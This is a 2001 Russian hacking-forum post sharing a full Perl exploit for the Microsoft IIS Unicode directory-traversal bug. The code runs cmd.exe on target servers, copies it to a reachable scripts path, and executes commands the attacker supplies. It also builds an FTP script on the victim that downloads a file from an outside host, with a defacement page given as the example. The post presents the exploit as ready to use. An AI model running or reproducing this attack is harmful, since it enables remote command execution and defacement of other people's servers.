|
ru.nethack
- RU.NETHACK -------------------------------------------------------------------
From : Aijamal Azizaeva 2:5020/400 05 May 2001 09:34:04
To : All
Subject : Re: Где скачать %c0%af
--------------------------------------------------------------------------------
Здравствуй Олл!
"Aijamal Azizaeva" <master@svs.ru> сообщил/сообщила в новостях следующее:
news:9cnh5u$31h6$1@ns.ctinet.ru...
Тут в поле зрения один эксплойтик для закачки на сервак с сабжевой
уязвимостью попался. Может кому пригодиться. ;-)
http://www.ukrteam.lgg.ru/files/iisxploit.txt
#!/usr/bin/perl -w
#:: Micr0s0ft IIS Unicode Bug exploit
#:: coded by Silence
#:: UkR team [ www.ukrteam.ru ]
use LWP::UserAgent;
use HTTP::Request::Common qw(GET);
use Getopt::Std;
system("cls ; clear");
getopts("h:d:f:ic:");
{
unless ( ( defined($opt_h) && ( defined($opt_f) || defined($opt_c)) ) ||
defined($opt_i) ) {
print "SHIT";
Usage();
}
}
print <<HEADER;
:: Micr0s0ft IIS Unicode Bug exploit
:: coded by Silence
:: UkR team [ www.ukrteam.ru ]
HEADER
if ($opt_i) {
my ($host, $ftp, $ftp_host, $ftp_file, @ftp_file, $dest, $cmd,
$choice);
print "Enter hostname or IP address: ";
($host = <STDIN>) =~ s/\n//;
Usage() if ( $host eq '' or $host =~ /^http\:/);
print "\nDo you want to upload file on $host? [y|n]";
($choice = <STDIN>) =~ s/\n//;
if ($choice eq 'y') {
print "\nEnter public ftp address/what file to upload: ";
($ftp = <STDIN>) =~ s/\n//;
Usage() if ( $ftp eq '' or $ftp =~ /^ftp\:/);
($ftp_host, @ftp_file) = split (/\//, $ftp);
$ftp_file = join(@ftp_file, '/');
print "\nEnter destination (where to upload file): ";
($dest = <STDIN>) =~ s/\n//;
Usage() if ( $dest ne '' && $dest !~ /^\w\:/);
Burst('ftp', $host, $ftp_host, $ftp_file, $dest);
}
else {
print "\nOk, then type command to execute: ";
($cmd = <STDIN>) =~ s/\n//;
if ( $cmd eq '') {
print "\n:: So whaddya want? huh...\n";
exit;
}
$cmd =~ s/\s+/\%20/g;
Burst('cmd', $host, $cmd);
}
}
else {
if (defined($opt_f)) {
my ($ftp_host, @ftp_file) = split (/\//, $opt_f);
my $ftp_file = join("/", @ftp_file);
my $dest = ( defined($opt_d) ? $opt_d :
"c:\\inetpub\\scripts\\" );
Burst('ftp', $opt_h, $ftp_host, $ftp_file, $dest);
}
else {
my $cmd;
($cmd = $opt_c) =~ s/\_/\%20/g;
Burst('cmd', $opt_h, $cmd);
}
}
sub Burst {
my ($method, $host, @others) = @_;
$host = "http://" . $host;
my $referer = "http://www.link2u.com/?query=ukrteam";
my $sf = LWP::UserAgent -> new();
$sf -> agent("Mozilla/4.0 (compatible)");
# $sf->proxy('http', "http://24.142.102.150:80"); # 'course, you can change
this
my $c = GET
"$host/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+co
py+c:\\winnt\\system32\\cmd.exe+c:\\inetpub\\scripts\\counter.exe";
$c -> referer($referer);
print "\n:: Trying to copy cmd.exe in appropriate space...\n::
Server responce is:\n::::::\n";
my $result = $sf -> request($c)->as_string;
die ":: Bad luck: $host cannot be found. Maybe you've misspelled
it?\n" if ($result =~ /Bad\shostname/);
die ":: Bad luck: an error occured while trying to phack $host due
to proxy error or network problems\n" if ($result =~ /Unknown\serror/);
print $result . "::::::\n";
if ($method eq 'ftp') {
my @xplo = (
"echo+open+$others[0]+>c:\\autoexec.001",
"echo+anonymous+>>c:\\autoexec.001",
"echo+e\@mail.com+>>c:\\autoexec.001",
"echo+get+$others[1]+$others[2]+>>c:\\autoexec.001",
"echo+quit+>>c:\\autoexec.001",
"ftp%20-s:c:\\autoexec.001%20-n%20-d%20$others[0]"
);
foreach my $cmd (@xplo) {
$c = GET "$host/scripts/counter.exe?/c+$cmd";
$c -> referer($referer);
print ":: Sending code \"$host/scripts/counter.exe?/c+$cmd...\"\n";
$result = $sf -> request($c)->as_string;
print "::Responce is:
\n::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\n"
. $result .
"::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\n";
sleep(2);
}
print ":: Hopefully, done.
:: I guess, $others[0]/$others[1] is now on $host, in folder $others[2]\n
:: Visit www.ukrteam.ru\n";
exit;
}
elsif ($method eq 'cmd') {
$c = GET "$host/scripts/counter.exe?/c+$others[0]";
$c -> referer($referer);
print ":: Executing $others[0]...\n";
$result = $sf -> request($c)->as_string;
print ":: Server responce
is:\n::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\n";
print $result .
"::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\n";
print ":: Visit www.ukrteam.ru\n";
}
}
#my $req = GET =>
"$host/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+de
l+c:\inetpub\scripts\counter.exe";
sub Usage {
print <<USAGE;
:: Micr0s0ft IIS Unicode Bug exploit
:: coded by Silence
:: UkR team [ www.ukrteam.ru ]
Usage is pretty simple:
./iis_sploit.pl -h <HOST_NAME>
-f <FTP_SERVER/FILENAME> -w <WHERE_TO_PLACE>
-c <COMMAND>
-i
Lets look what do we have:
HOSTNAME :: I guess, clear enough;)
(should be either DNS name or IP, w/out 'http://')
Then supply one of following options:
FTP_SERVER :: anonymous ftp server
FILENAME :: for example, incoming/deface.html
WHERE_TO_PLACE :: www-accessible place, where you want to put u'r file
(by default, server r00t)
COMMAND :: supply this only if you don't want to upload files,
xploit will return result of COMMAND execution.
note: if command take more that 1 arg, separate 'em
by _s. I. e., 'dir c:\' should be 'dir_c:\'.
If you supply just '-i', it will run interactively and prompt you for
hostname, ftp host and so on. If you need it, you got it.
Canonicalisation error.. duh :)
USAGE
exit;
}
Без нарушения копирайтов.
Айжамал. aigamal@mail.ru 2:5030/1189.49
--- ifmail v.2.15dev5
* Origin: CAT Technology (2:5020/400)
Вернуться к списку тем, сортированных по: возрастание даты уменьшение даты тема автор
|
Re: Где скачать %c0%af